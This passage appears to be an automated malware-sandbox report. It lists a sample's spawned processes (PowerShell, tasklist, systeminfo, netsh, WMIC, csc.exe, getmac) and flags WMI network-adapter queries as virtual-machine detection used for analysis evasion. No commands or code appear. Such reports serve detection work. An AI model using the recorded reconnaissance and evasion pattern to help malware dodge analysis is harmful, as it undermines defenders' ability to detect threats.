Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
